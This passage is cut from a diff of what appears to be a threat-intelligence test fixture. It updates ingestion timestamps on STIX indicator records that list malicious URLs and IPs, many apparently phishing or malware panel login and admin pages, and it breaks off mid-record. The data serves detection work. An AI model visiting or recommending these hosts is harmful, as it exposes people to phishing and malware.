'http://serviciotecnicoenperu.com/contactar/zz/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:41.785Z\"}", "category": "threat", "type": "indicator", @@ -20550,7 +20550,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025147500Z", + "ingested": "2021-12-14T14:57:43.118343360Z", "original": "{\"created\":\"2020-02-08T14:04:43.759Z\",\"description\":\"TS ID: 55298071859; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--dfdca2f0-75cc-4e33-9045-e2ba136c0183\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-08T14:04:43.759Z\",\"name\":\"mal_url: http://xgkxc.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://xgkxc.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:43.759Z\"}", "category": "threat", "type": "indicator", @@ -20601,7 +20601,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025154600Z", + "ingested": "2021-12-14T14:57:43.118343907Z", "original": "{\"created\":\"2020-02-08T14:04:43.783Z\",\"description\":\"TS ID: 55298070283; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--0e501865-d0a0-493b-8302-02efe0f2c5d1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-08T14:04:43.783Z\",\"name\":\"mal_url: http://kmfjlool.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://kmfjlool.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:43.783Z\"}", "category": "threat", "type": "indicator", @@ -20646,7 +20646,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025161800Z", + "ingested": "2021-12-14T14:57:43.118344345Z", "original": "{\"created\":\"2020-02-09T05:09:33.689Z\",\"description\":\"TS ID: 55300025372; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--91f46249-8fa5-4e88-bb38-0448b08b5448\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-09T05:09:33.689Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-09T05:09:33.689Z\"}", "category": "threat", "type": "indicator", @@ -20697,7 +20697,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025166Z", + "ingested": "2021-12-14T14:57:43.118344724Z", "original": "{\"created\":\"2020-02-10T02:01:30.459Z\",\"description\":\"TS ID: 55303483956; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--07925c70-b345-4aa6-8f40-e19602cf0429\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-10T02:01:30.459Z\",\"name\":\"mal_url: http://pentestblog.xyz/panel/login/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pentestblog.xyz/panel/login/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:01:30.459Z\"}", "category": "threat", "type": "indicator", @@ -20749,7 +20749,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025171500Z", + "ingested": "2021-12-14T14:57:43.118345229Z", "original": "{\"created\":\"2020-02-10T02:01:36.571Z\",\"description\":\"TS ID: 55303483889; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--00195f28-4745-41a3-9710-7e2266b1270e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-02-10T02:01:36.571Z\",\"name\":\"mal_url: http://f0386817.xsph.ru/32cd6120/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0386817.xsph.ru/32cd6120/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:01:36.571Z\"}", "category": "threat", "type": "indicator", @@ -20800,7 +20800,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025177Z", + "ingested": "2021-12-14T14:57:43.118345705Z", "original": "{\"created\":\"2020-02-10T02:01:36.621Z\",\"description\":\"TS ID: 55303483880; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--eae0ef0b-3b77-401b-8835-4ad9cb97171d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-10T02:01:36.621Z\",\"name\":\"mal_url: http://f0395086.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0395086.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:01:36.621Z\"}", "category": "threat", "type": "indicator", @@ -20852,7 +20852,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025183400Z", + "ingested": "2021-12-14T14:57:43.118346154Z", "original": "{\"created\":\"2020-02-10T02:02:06.427Z\",\"description\":\"TS ID: 55303483638; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--05d25a1d-cf55-4b36-93ee-dbf618980b2f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-44\"],\"modified\":\"2020-02-10T02:02:06.427Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:06.427Z\"}", "category": "threat", "type": "indicator", @@ -20904,7 +20904,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025187300Z", + "ingested": "2021-12-14T14:57:43.118346853Z", "original": "{\"created\":\"2020-02-10T02:02:14.887Z\",\"description\":\"TS ID: 55303483942; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--9af2b6ee-aec5-481a-8e93-2a7153fcf05e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-10T02:02:14.887Z\",\"name\":\"mal_url: http://worldatdoor.in/wire/32/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/wire/32/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:14.887Z\"}", "category": "threat", "type": "indicator", @@ -20956,7 +20956,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025192600Z", + "ingested": "2021-12-14T14:57:43.118347384Z", "original": "{\"created\":\"2020-02-10T02:02:16.263Z\",\"description\":\"TS ID: 55303483899; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--1641ace0-37a5-4364-8400-e422b5cdbcec\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-02-10T02:02:16.263Z\",\"name\":\"mal_url: http://wwe23pro.myjino.ru/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://wwe23pro.myjino.ru/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:16.263Z\"}", "category": "threat", "type": "indicator", @@ -21001,7 +21001,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025200200Z", + "ingested": "2021-12-14T14:57:43.118347795Z", "original": "{\"created\":\"2020-02-10T02:02:35.848Z\",\"description\":\"TS ID: 55303483868; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--3e09e501-0b80-4de6-b5a9-1d30b5687a24\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-44\"],\"modified\":\"2020-02-10T02:02:35.848Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:35.848Z\"}", "category": "threat", "type": "indicator", @@ -21052,7 +21052,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025204500Z", + "ingested": "2021-12-14T14:57:43.118348271Z", "original": "{\"created\":\"2020-02-10T02:02:45.419Z\",\"description\":\"TS ID: 55303483940; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--85ab9568-e7f5-40c6-935d-8bdbe263970c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-65\"],\"modified\":\"2020-02-10T02:02:45.419Z\",\"name\":\"mal_url: http://garex.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://garex.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:45.419Z\"}", "category": "threat", "type": "indicator", @@ -21104,7 +21104,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025209100Z", + "ingested": "2021-12-14T14:57:43.118348781Z", "original": "{\"created\":\"2020-02-10T02:02:47.096Z\",\"description\":\"TS ID: 55303483952; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--05509090-9cd9-43b0-892c-02318134a893\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-02-10T02:02:47.096Z\",\"name\":\"mal_url: http://jerichoconstructioncompany.com/wps/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jerichoconstructioncompany.com/wps/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:47.096Z\"}", "category": "threat", "type": "indicator", @@ -21155,7 +21155,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025212700Z", + "ingested": "2021-12-14T14:57:43.118349316Z", "original": "{\"created\":\"2020-02-10T02:02:55.786Z\",\"description\":\"TS ID: 55303483873; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--c884bffa-1248-483b-bdf8-dada05340ea4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-10T02:02:55.786Z\",\"name\":\"mal_url: http://f0396079.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0396079.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:55.786Z\"}", "category": "threat", "type": "indicator", @@ -21207,7 +21207,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025217800Z", + "ingested": "2021-12-14T14:57:43.118349757Z", "original": "{\"created\":\"2020-02-10T02:03:03.62Z\",\"description\":\"TS ID: 55303483931; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--14bb6b9e-e4f9-4059-a1a0-f06481441883\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-10T02:03:03.62Z\",\"name\":\"mal_url: http://impulsefittness.info/webpanel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://impulsefittness.info/webpanel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:03:03.62Z\"}", "category": "threat", "type": "indicator", @@ -21259,7 +21259,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025223800Z", + "ingested": "2021-12-14T14:57:43.118350265Z", "original": "{\"created\":\"2020-02-10T02:03:53.711Z\",\"description\":\"TS ID: 55303483865; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--92bdd0d7-0d15-4bcb-bf37-6aec2b0114b8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-10T02:03:53.711Z\",\"name\":\"mal_url: http://pentestblog.xyz/csc/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pentestblog.xyz/csc/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:03:53.711Z\"}", "category": "threat", "type": "indicator", @@ -21310,7 +21310,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025230100Z", + "ingested": "2021-12-14T14:57:43.118350759Z", "original": "{\"created\":\"2020-02-10T02:03:57.56Z\",\"description\":\"TS ID: 55303483938; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--eb0c4603-82ac-4283-bda3-ce9d276bc002\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-10T02:03:57.56Z\",\"name\":\"mal_url: http://pom4ekk.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pom4ekk.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:03:57.56Z\"}", "category": "threat", "type": "indicator", @@ -21361,7 +21361,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025237400Z", + "ingested": "2021-12-14T14:57:43.118351167Z", "original": "{\"created\":\"2020-02-10T02:04:24.419Z\",\"description\":\"TS ID: 55303483870; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--14393248-efcc-4446-9c71-c24b8ea653ab\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-10T02:04:24.419Z\",\"name\":\"mal_url: http://f0396384.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0396384.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:04:24.419Z\"}", "category": "threat", "type": "indicator", @@ -21412,7 +21412,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025244500Z", + "ingested": "2021-12-14T14:57:43.118352529Z", "original": "{\"created\":\"2020-02-10T02:04:39.273Z\",\"description\":\"TS ID: 55303483883; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--5139b761-30aa-48b8-a7f6-4d125117fd4d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-10T02:04:39.273Z\",\"name\":\"mal_url: http://f0391247.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391247.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:04:39.273Z\"}", "category": "threat", "type": "indicator", @@ -21464,7 +21464,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025251600Z", + "ingested": "2021-12-14T14:57:43.118353115Z", "original": "{\"created\":\"2020-02-11T02:05:59.738Z\",\"description\":\"TS ID: 55306531291; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--8aed750b-7bc5-41be-956d-5c27ba956957\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-11T02:05:59.738Z\",\"name\":\"mal_url: http://borrdrillling.com/benz-forlife/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://borrdrillling.com/benz-forlife/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-11T02:05:59.738Z\"}", "category": "threat", "type": "indicator", @@ -21515,7 +21515,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025258800Z", + "ingested": "2021-12-14T14:57:43.118353569Z", "original": "{\"created\":\"2020-02-11T02:06:33.437Z\",\"description\":\"TS ID: 55306531295; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--939b7b32-9004-40e0-8c48-77b9452a0902\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-11T02:06:33.437Z\",\"name\":\"mal_url: http://borrdrillling.com/fox/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://borrdrillling.com/fox/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-11T02:06:33.437Z\"}", "category": "threat", "type": "indicator", @@ -21567,7 +21567,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025266100Z", + "ingested": "2021-12-14T14:57:43.118353958Z", "original": "{\"created\":\"2020-02-11T02:06:48.532Z\",\"description\":\"TS ID: 55306531290; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--f2f9ebc5-814d-4ff2-9979-76264e15d743\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-11T02:06:48.532Z\",\"name\":\"mal_url: http://borrdrillling.com/benz/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://borrdrillling.com/benz/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-11T02:06:48.532Z\"}", "category": "threat", "type": "indicator", @@ -21619,7 +21619,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025273400Z", + "ingested": "2021-12-14T14:57:43.118354417Z", "original": "{\"created\":\"2020-02-11T02:07:49.317Z\",\"description\":\"TS ID: 55306531320; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--782c926c-e92f-451e-8aaf-dbe446b8abe4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-02-11T02:07:49.317Z\",\"name\":\"mal_url: http://klickus.com/okye/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://klickus.com/okye/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-11T02:07:49.317Z\"}", "category": "threat", "type": "indicator", @@ -21671,7 +21671,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025280600Z", + "ingested": "2021-12-14T14:57:43.118355129Z", "original": "{\"created\":\"2020-02-11T02:07:49.341Z\",\"description\":\"TS ID: 55306531298; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--336d437c-cb0b-473c-b157-3edad63d3a65\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-02-11T02:07:49.341Z\",\"name\":\"mal_url: http://klickus.com/gozie/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://klickus.com/gozie/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-11T02:07:49.341Z\"}", "category": "threat", "type": "indicator", @@ -21723,7 +21723,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025286400Z", + "ingested": "2021-12-14T14:57:43.118355571Z", "original": "{\"created\":\"2020-02-12T02:02:34.926Z\",\"description\":\"TS ID: 55309106417; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--1fff5727-69fd-4477-a610-3542e53642ae\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-12T02:02:34.926Z\",\"name\":\"mal_url: http://alwaysdelivery.xyz/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://alwaysdelivery.xyz/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-12T02:02:34.926Z\"}", "category": "threat", "type": "indicator", @@ -21775,7 +21775,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025293700Z", + "ingested": "2021-12-14T14:57:43.118356003Z", "original": "{\"created\":\"2020-02-12T02:03:19.477Z\",\"description\":\"TS ID: 55309106235; iType: mal_url; State: active; Org: VoenTelecom nets; Source: CyberCrime\",\"id\":\"indicator--8c3385b7-6ee5-4699-87c8-7a7b1da9b6aa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-49\"],\"modified\":\"2020-02-12T02:03:19.477Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-12T02:03:19.477Z\"}", "category": "threat", "type": "indicator", @@ -21820,7 +21820,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025301Z", + "ingested": "2021-12-14T14:57:43.118379508Z", "original": "{\"created\":\"2020-02-13T02:02:41.467Z\",\"description\":\"TS ID: 55311776075; iType: mal_ip; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--91ef9dde-3f0a-472c-b8ec-a1b9951acb50\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-13T02:02:41.467Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:02:41.467Z\"}", "category": "threat", "type": "indicator", @@ -21872,7 +21872,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025308200Z", + "ingested": "2021-12-14T14:57:43.118380434Z", "original": "{\"created\":\"2020-02-13T02:02:52.653Z\",\"description\":\"TS ID: 55311776233; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--948a3e06-3481-4873-94e7-8ab068284aba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-13T02:02:52.653Z\",\"name\":\"mal_url: http://felicombo.club/Zebra/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://felicombo.club/Zebra/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:02:52.653Z\"}", "category": "threat", "type": "indicator", @@ -21924,7 +21924,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025312400Z", + "ingested": "2021-12-14T14:57:43.118380912Z", "original": "{\"created\":\"2020-02-13T02:03:16.624Z\",\"description\":\"TS ID: 55311776246; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--3b3faeec-4f78-41f2-acd8-13090336f058\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-13T02:03:16.624Z\",\"name\":\"mal_url: http://pdocxoffice.com/Panel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pdocxoffice.com/Panel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:03:16.624Z\"}", "category": "threat", "type": "indicator", @@ -21976,7 +21976,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025317700Z", + "ingested": "2021-12-14T14:57:43.118381346Z", "original": "{\"created\":\"2020-02-13T02:03:36.577Z\",\"description\":\"TS ID: 55311776248; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--ae6ff4c4-73c1-473a-90cb-99f135240243\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-13T02:03:36.577Z\",\"name\":\"mal_url: http://megaeditores.com/fgv/PHP/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://megaeditores.com/fgv/PHP/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:03:36.577Z\"}", "category": "threat", "type": "indicator", @@ -22028,7 +22028,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025323200Z", + "ingested": "2021-12-14T14:57:43.118381909Z", "original": "{\"created\":\"2020-02-13T02:03:38.86Z\",\"description\":\"TS ID: 55311776237; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--104abde1-c4e9-45a2-85e1-525ea3bec752\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-23\"],\"modified\":\"2020-02-13T02:03:38.86Z\",\"name\":\"mal_url: http://89.160.20.156/prUjRYcU2rqFpZqv/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/prUjRYcU2rqFpZqv/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:03:38.86Z\"}", "category": "threat", "type": "indicator", @@ -22079,7 +22079,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025329300Z", + "ingested": "2021-12-14T14:57:43.118382298Z", "original": "{\"created\":\"2020-02-20T04:06:53.787Z\",\"description\":\"TS ID: 55316616622; iType: mal_url; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--57d0bd25-4211-4e2e-8a4e-31e38eeda90b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T04:06:53.787Z\",\"name\":\"mal_url: http://hotlips.top/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://hotlips.top/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:06:53.787Z\"}", "category": "threat", "type": "indicator", @@ -22130,7 +22130,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025333200Z", + "ingested": "2021-12-14T14:57:43.118382680Z", "original": "{\"created\":\"2020-02-20T04:08:45.548Z\",\"description\":\"TS ID: 55316617564; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--d11be9c2-b408-42a4-a4ad-0ede3c1709f0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-20T04:08:45.548Z\",\"name\":\"mal_url: http://aflamdirectory.com/wp-content/ip/login/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aflamdirectory.com/wp-content/ip/login/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:08:45.548Z\"}", "category": "threat", "type": "indicator", @@ -22182,7 +22182,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025338600Z", + "ingested": "2021-12-14T14:57:43.118383180Z", "original": "{\"created\":\"2020-02-20T04:08:45.601Z\",\"description\":\"TS ID: 55316617187; iType: mal_url; State: active; Org: Telenet Ltd.; Source: CyberCrime\",\"id\":\"indicator--ed5ed1a3-8090-4db3-92cb-3b7b733fa28e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T04:08:45.601Z\",\"name\":\"mal_url: 